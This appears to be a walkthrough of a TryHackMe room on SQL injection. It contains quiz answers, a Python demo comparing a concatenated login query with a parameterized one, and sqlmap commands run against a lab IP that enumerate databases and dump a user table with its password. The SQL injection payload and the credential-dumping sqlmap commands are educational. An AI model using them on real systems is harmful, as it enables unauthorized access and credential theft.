INTRODUCTION
Task 1: Introduction
Q. Which language builds the interaction between a website and its database?
A. Sql
Explanation: SQL is a language used to talk to databases. It helps you store, find, update, and delete data.
Task 2: SQL Injection Vulnerability
Q1. Which boolean operator checks if at least one side of the operator is true for the condition to be true?
A1. OR
Q2. Is 1=1 in an SQL query always true? (YEA/NAY)
A2. YEA
Explanation
The boolean operator OR is used to evaluate multiple conditions where only one condition
needs to be true for the overall expression to be true.
If either the left side or the right side of the operator evaluates to true, the entire
condition becomes true. The result is false only when both conditions are false.
1 = 1 is a condition that always evaluates to true in SQL because both sides of the
comparison are identical. The database does not depend on any table data to evaluate it, so
the condition is true for every row.
Because of this behavior, 1=1 is commonly abused in SQL injection attacks to force a query
to return results or bypass logical checks, such as authentication conditions.
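Added example (not part of the original write-up): a login check built by string concatenation next to the same check with a parameterized query, run against an in-memory SQLite database. The table layout, function names and sample account are constructed for illustration.

```python
import sqlite3


def make_db():
    # Constructed sample data: one account in an in-memory database.
    # The plaintext password only keeps the demo short.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (email TEXT, password TEXT)")
    db.execute("INSERT INTO user VALUES ('alice@example.test', 'correct-horse')")
    return db


def login_concat(db, email, password):
    # Vulnerable: user input is pasted into the SQL text, so a quote in the
    # input can end the string literal and add its own condition.
    query = ("SELECT email FROM user WHERE email = '" + email +
             "' AND password = '" + password + "'")
    return db.execute(query).fetchall()


def login_param(db, email, password):
    # Hardened: placeholders send the input as data, never as SQL syntax.
    query = "SELECT email FROM user WHERE email = ? AND password = ?"
    return db.execute(query, (email, password)).fetchall()


def demo():
    db = make_db()
    # With this input the WHERE clause becomes
    #   (email = 'nobody' AND password = 'x') OR 1=1
    # AND binds tighter than OR, and 1=1 is true for every row.
    injected = "x' OR 1=1 -- "
    return {
        "concat_valid": login_concat(db, "alice@example.test", "correct-horse"),
        "concat_injected": login_concat(db, "nobody", injected),
        "param_valid": login_param(db, "alice@example.test", "correct-horse"),
        "param_injected": login_param(db, "nobody", injected),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The concatenated query returns the stored account for the injected input even though no valid credentials were supplied, while the parameterized query returns no rows for the same input.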
Task 3: Automated SQL Injection Tool
Q-1. Which flag in the SQLMap tool is used to extract all the databases available?
A-1. --dbs
Q-2. What would be the full command of SQLMap for extracting all tables from the "members" database? (Vulnerable URL: http://sqlmaptesting.thm/search/cat=1)
A-2. sqlmap -u 'http://sqlmaptesting.thm/search/cat=1' -D members --tables
Explanation:
SQLMap is an automated, open-source command-line tool used to detect and exploit SQL
injection vulnerabilities in web applications. It automatically tests parameters, identifies
the database type, and extracts data if a vulnerability exists.
Flags
-u → specify URL
--dbs → list databases
-D database_name --tables → list all tables in the database
-D database_name -T table_name --dump → dump the records of the table
Task 4: Practical Exercise
Q-1. How many databases are available in this web application?
A-1. 6
Command Used
sqlmap -u 'http://10.49.157.138/ai/includes/user_login?email=test&password=test' --dbs
Q-2. What is the name of the table available in the "ai" database?
A-2. user
Command Used
sqlmap -u 'http://10.49.157.138/ai/includes/user_login?email=test&password=test' -D ai --tables
Q-3. What is the password of the email test@chatai.com?
A-3. 12345678
Command Used
sqlmap -u 'http://10.49.157.138/ai/includes/user_login?email=test&password=test' -D ai -T user --dump